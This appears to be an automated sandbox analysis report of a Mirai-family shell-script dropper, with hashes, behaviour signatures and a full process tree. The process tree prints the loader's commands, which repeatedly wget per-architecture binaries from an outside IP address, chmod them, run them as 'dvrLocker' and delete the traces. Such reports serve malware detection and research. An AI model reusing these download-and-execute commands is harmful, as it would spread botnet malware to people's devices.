Analysis
-
max time kernel
26s -
max time network
27s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240729-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
09-11-2024 03:32
Static task
static1
Behavioral task
behavioral1
Sample
becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh
-
Size
923B
-
MD5
5419b553750dc94cb55eecefce2e1950
-
SHA1
bf1c8a80bcecfe13f81279a0392031d661e736ef
-
SHA256
becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049
-
SHA512
fb4d326c895be35fef16ae64708323567f6cbdd66267cb61e5de47e36289189a0295a6fcc2dd8482ab143e022d79ef846da37215735cc84931aafd01b7404d6e
Malware Config
Extracted
mirai
BOTNET
Signatures
-
Mirai family
-
File and Directory Permissions Modification 1 TTPs 24 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodpid process 864 chmod 886 chmod 897 chmod 902 chmod 912 chmod 937 chmod 959 chmod 968 chmod 997 chmod 843 chmod 854 chmod 982 chmod 823 chmod 833 chmod 892 chmod 917 chmod 926 chmod 977 chmod 987 chmod 992 chmod 814 chmod 879 chmod 907 chmod 948 chmod -
Executes dropped EXE 24 IoCs
Processes:
dvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerioc pid process /tmp/lib/dvrLocker 815 dvrLocker /tmp/lib/dvrLocker 824 dvrLocker /tmp/lib/dvrLocker 835 dvrLocker /tmp/lib/dvrLocker 844 dvrLocker /tmp/lib/dvrLocker 855 dvrLocker /tmp/lib/dvrLocker 865 dvrLocker /tmp/lib/dvrLocker 880 dvrLocker /tmp/lib/dvrLocker 887 dvrLocker /mnt/dvrLocker 893 dvrLocker /mnt/dvrLocker 898 dvrLocker /mnt/dvrLocker 903 dvrLocker /mnt/dvrLocker 908 dvrLocker /mnt/dvrLocker 913 dvrLocker /mnt/dvrLocker 918 dvrLocker /mnt/dvrLocker 927 dvrLocker /mnt/dvrLocker 939 dvrLocker /mnt/dvrLocker 950 dvrLocker /mnt/dvrLocker 960 dvrLocker /mnt/dvrLocker 970 dvrLocker /mnt/dvrLocker 978 dvrLocker /mnt/dvrLocker 983 dvrLocker /mnt/dvrLocker 988 dvrLocker /mnt/dvrLocker 993 dvrLocker /mnt/dvrLocker 998 dvrLocker -
Processes:
lslslslslslslslslslslslslslslslslslslslslslslslslslslslslslslslslslslslslslslslslslslslsmkdirlslslslslslslslslslslslslslslslslslslsdescription ioc process File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems mkdir File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls -
System Network Configuration Discovery 1 TTPs 6 IoCs
Adversaries may gather information about the network configuration of a system.
Processes:
rmwgetrmwgetrmwgetpid process 963 rm 819 wget 827 rm 896 wget 900 rm 954 wget -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
Processes:
becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.shdescription ioc process File opened for modification /tmp/lib/dvrLocker becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh
Processes
-
/tmp/becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh/tmp/becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh1⤵
- Writes file to tmp directory
PID:709 -
/bin/lsls -l /proc/1/exe2⤵
- Reads runtime system information
PID:711 -
/bin/lsls -l /proc/10/exe2⤵
- Reads runtime system information
PID:717 -
/bin/lsls -l /proc/109/exe2⤵
- Reads runtime system information
PID:721 -
/bin/lsls -l /proc/11/exe2⤵PID:724
-
/bin/lsls -l /proc/12/exe2⤵
- Reads runtime system information
PID:727 -
/bin/lsls -l /proc/125/exe2⤵
- Reads runtime system information
PID:731 -
/bin/lsls -l /proc/126/exe2⤵
- Reads runtime system information
PID:734 -
/bin/lsls -l /proc/13/exe2⤵
- Reads runtime system information
PID:736 -
/bin/lsls -l /proc/14/exe2⤵
- Reads runtime system information
PID:738 -
/bin/lsls -l /proc/15/exe2⤵
- Reads runtime system information
PID:740 -
/bin/lsls -l /proc/155/exe2⤵
- Reads runtime system information
PID:741 -
/bin/lsls -l /proc/16/exe2⤵
- Reads runtime system information
PID:743 -
/bin/lsls -l /proc/160/exe2⤵
- Reads runtime system information
PID:746 -
/bin/lsls -l /proc/17/exe2⤵
- Reads runtime system information
PID:748 -
/bin/lsls -l /proc/179/exe2⤵
- Reads runtime system information
PID:749 -
/bin/lsls -l /proc/18/exe2⤵
- Reads runtime system information
PID:750 -
/bin/lsls -l /proc/19/exe2⤵
- Reads runtime system information
PID:752 -
/bin/lsls -l /proc/2/exe2⤵
- Reads runtime system information
PID:753 -
/bin/lsls -l /proc/20/exe2⤵
- Reads runtime system information
PID:754 -
/bin/lsls -l /proc/21/exe2⤵
- Reads runtime system information
PID:755 -
/bin/lsls -l /proc/22/exe2⤵
- Reads runtime system information
PID:756 -
/bin/lsls -l /proc/23/exe2⤵
- Reads runtime system information
PID:757 -
/bin/lsls -l /proc/24/exe2⤵
- Reads runtime system information
PID:758 -
/bin/lsls -l /proc/241/exe2⤵
- Reads runtime system information
PID:759 -
/bin/lsls -l /proc/3/exe2⤵
- Reads runtime system information
PID:760 -
/bin/lsls -l /proc/328/exe2⤵
- Reads runtime system information
PID:761 -
/bin/lsls -l /proc/329/exe2⤵
- Reads runtime system information
PID:762 -
/bin/lsls -l /proc/332/exe2⤵
- Reads runtime system information
PID:763 -
/bin/lsls -l /proc/334/exe2⤵
- Reads runtime system information
PID:764 -
/bin/lsls -l /proc/36/exe2⤵
- Reads runtime system information
PID:765 -
/bin/lsls -l /proc/361/exe2⤵
- Reads runtime system information
PID:766 -
/bin/lsls -l /proc/37/exe2⤵
- Reads runtime system information
PID:767 -
/bin/lsls -l /proc/377/exe2⤵
- Reads runtime system information
PID:768 -
/bin/lsls -l /proc/380/exe2⤵PID:769
-
/bin/lsls -l /proc/385/exe2⤵
- Reads runtime system information
PID:770 -
/bin/lsls -l /proc/388/exe2⤵
- Reads runtime system information
PID:771 -
/bin/lsls -l /proc/4/exe2⤵
- Reads runtime system information
PID:772 -
/bin/lsls -l /proc/434/exe2⤵
- Reads runtime system information
PID:773 -
/bin/lsls -l /proc/5/exe2⤵
- Reads runtime system information
PID:774 -
/bin/lsls -l /proc/6/exe2⤵
- Reads runtime system information
PID:775 -
/bin/lsls -l /proc/675/exe2⤵
- Reads runtime system information
PID:776 -
/bin/lsls -l /proc/678/exe2⤵
- Reads runtime system information
PID:777 -
/bin/lsls -l /proc/68/exe2⤵
- Reads runtime system information
PID:778 -
/bin/lsls -l /proc/680/exe2⤵
- Reads runtime system information
PID:779 -
/bin/lsls -l /proc/684/exe2⤵
- Reads runtime system information
PID:780 -
/bin/lsls -l /proc/685/exe2⤵
- Reads runtime system information
PID:781 -
/bin/lsls -l /proc/69/exe2⤵
- Reads runtime system information
PID:782 -
/bin/lsls -l /proc/7/exe2⤵
- Reads runtime system information
PID:783 -
/bin/lsls -l /proc/701/exe2⤵
- Reads runtime system information
PID:784 -
/bin/lsls -l /proc/702/exe2⤵
- Reads runtime system information
PID:785 -
/bin/lsls -l /proc/704/exe2⤵
- Reads runtime system information
PID:786 -
/bin/lsls -l /proc/706/exe2⤵
- Reads runtime system information
PID:787 -
/bin/lsls -l /proc/707/exe2⤵
- Reads runtime system information
PID:788 -
/bin/lsls -l /proc/708/exe2⤵
- Reads runtime system information
PID:789 -
/bin/lsls -l /proc/709/exe2⤵
- Reads runtime system information
PID:790 -
/bin/lsls -l /proc/72/exe2⤵
- Reads runtime system information
PID:791 -
/bin/lsls -l /proc/73/exe2⤵
- Reads runtime system information
PID:792 -
/bin/lsls -l /proc/74/exe2⤵PID:793
-
/bin/lsls -l /proc/75/exe2⤵
- Reads runtime system information
PID:794 -
/bin/lsls -l /proc/76/exe2⤵
- Reads runtime system information
PID:795 -
/bin/lsls -l /proc/77/exe2⤵
- Reads runtime system information
PID:796 -
/bin/lsls -l /proc/78/exe2⤵
- Reads runtime system information
PID:797 -
/bin/lsls -l /proc/8/exe2⤵
- Reads runtime system information
PID:798 -
/bin/lsls -l /proc/81/exe2⤵
- Reads runtime system information
PID:799 -
/bin/lsls -l /proc/83/exe2⤵
- Reads runtime system information
PID:800 -
/bin/lsls -l /proc/9/exe2⤵
- Reads runtime system information
PID:803 -
/bin/rmrm -rf /tmp/lib/2⤵PID:804
-
/bin/rmrm -rf /tmp/lib/dvrLocker2⤵PID:806
-
/bin/mkdirmkdir /tmp/lib/2⤵
- Reads runtime system information
PID:808 -
/usr/bin/wgetwget http://45.202.35.91/tmpsl -O -2⤵PID:809
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:814 -
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:815 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:815
-
/bin/rmrm -rf tmpsl2⤵PID:817
-
/usr/bin/wgetwget http://45.202.35.91/tmips -O -2⤵
- System Network Configuration Discovery
PID:819 -
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:823 -
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:824 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:824
-
/bin/rmrm -rf tmips2⤵
- System Network Configuration Discovery
PID:827 -
/usr/bin/wgetwget http://45.202.35.91/tarm -O -2⤵PID:829
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:833 -
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:835 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:835
-
/bin/rmrm -rf tarm2⤵PID:837
-
/usr/bin/wgetwget http://45.202.35.91/tarm5 -O -2⤵PID:838
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:843 -
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:844 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:844
-
/bin/rmrm -rf tarm52⤵PID:847
-
/usr/bin/wgetwget http://45.202.35.91/tppc -O -2⤵PID:849
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:854 -
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:855 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:855
-
/bin/rmrm -rf tppc2⤵PID:857
-
/usr/bin/wgetwget http://45.202.35.91/tarm7 -O -2⤵PID:858
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:864 -
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:865 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:865
-
/bin/rmrm -rf tarm72⤵PID:868
-
/usr/bin/wgetwget http://45.202.35.91/x86 -O -2⤵PID:870
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:879 -
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:880 -
/bin/rmrm -rf x862⤵PID:883
-
/usr/bin/wgetwget http://45.202.35.91/tarm6 -O -2⤵PID:884
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:886 -
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:887 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:887
-
/bin/rmrm -rf tarm62⤵PID:889
-
/bin/rmrm -rf /mnt/dvrLocker2⤵PID:890
-
/usr/bin/wgetwget http://45.202.35.91/tmpsl -O -2⤵PID:891
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:892 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:893 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:893
-
/bin/rmrm -rf tmpsl2⤵PID:895
-
/usr/bin/wgetwget http://45.202.35.91/tmips -O -2⤵
- System Network Configuration Discovery
PID:896 -
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:897 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:898 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:898
-
/bin/rmrm -rf tmips2⤵
- System Network Configuration Discovery
PID:900 -
/usr/bin/wgetwget http://45.202.35.91/tarm -O -2⤵PID:901
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:902 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:903 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:903
-
/bin/rmrm -rf tarm2⤵PID:905
-
/usr/bin/wgetwget http://45.202.35.91/tarm5 -O -2⤵PID:906
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:907 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:908 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:908
-
/bin/rmrm -rf tarm52⤵PID:910
-
/usr/bin/wgetwget http://45.202.35.91/tppc -O -2⤵PID:911
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:912 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:913 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:913
-
/bin/rmrm -rf tppc2⤵PID:915
-
/usr/bin/wgetwget http://45.202.35.91/tarm7 -O -2⤵PID:916
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:917 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:918 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:918
-
/bin/rmrm -rf tarm72⤵PID:920
-
/usr/bin/wgetwget http://45.202.35.91/x86 -O -2⤵PID:921
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:926 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:927 -
/bin/rmrm -rf x862⤵PID:931
-
/usr/bin/wgetwget http://45.202.35.91/tarm6 -O -2⤵PID:932
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:937 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:939 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:939
-
/bin/rmrm -rf tarm62⤵PID:942
-
/usr/bin/wgetwget http://45.202.35.91/tmpsl -O -2⤵PID:943
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:948 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:950 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:950
-
/bin/rmrm -rf tmpsl2⤵PID:953
-
/usr/bin/wgetwget http://45.202.35.91/tmips -O -2⤵
- System Network Configuration Discovery
PID:954 -
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:959 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:960 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:960
-
/bin/rmrm -rf tmips2⤵
- System Network Configuration Discovery
PID:963 -
/usr/bin/wgetwget http://45.202.35.91/tarm -O -2⤵PID:964
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:968 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:970 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:970
-
/bin/rmrm -rf tarm2⤵PID:973
-
/usr/bin/wgetwget http://45.202.35.91/tarm5 -O -2⤵PID:974
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:977 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:978 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:978
-
/bin/rmrm -rf tarm52⤵PID:980
-
/usr/bin/wgetwget http://45.202.35.91/tppc -O -2⤵PID:981
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:982 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:983 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:983
-
/bin/rmrm -rf tppc2⤵PID:985
-
/usr/bin/wgetwget http://45.202.35.91/tarm7 -O -2⤵PID:986
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:987 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:988 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:988
-
/bin/rmrm -rf tarm72⤵PID:990
-
/usr/bin/wgetwget http://45.202.35.91/x86 -O -2⤵PID:991
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:992 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:993 -
/bin/rmrm -rf x862⤵PID:995
-
/usr/bin/wgetwget http://45.202.35.91/tarm6 -O -2⤵PID:996
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:997 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:998 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:998
-
/bin/rmrm -rf tarm62⤵PID:1000
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
93KB
MD5bb9275394716c60d1941432c7085ca13
SHA143f6e51ca69e70abb7d6cfd7f11f15df3fcc97cc
SHA2563c0eb5de2946c558159a6b6a656d463febee037c17a1f605330e601cfcd39615
SHA512047ec8451a8d35ac67c7ff26e145cfe5536d94ef1a7d280d2e70dc4c3ed7dfd1386a957e1b76f50c10429774df02964d48d50d6bb8debc2c9a3bcced833b125d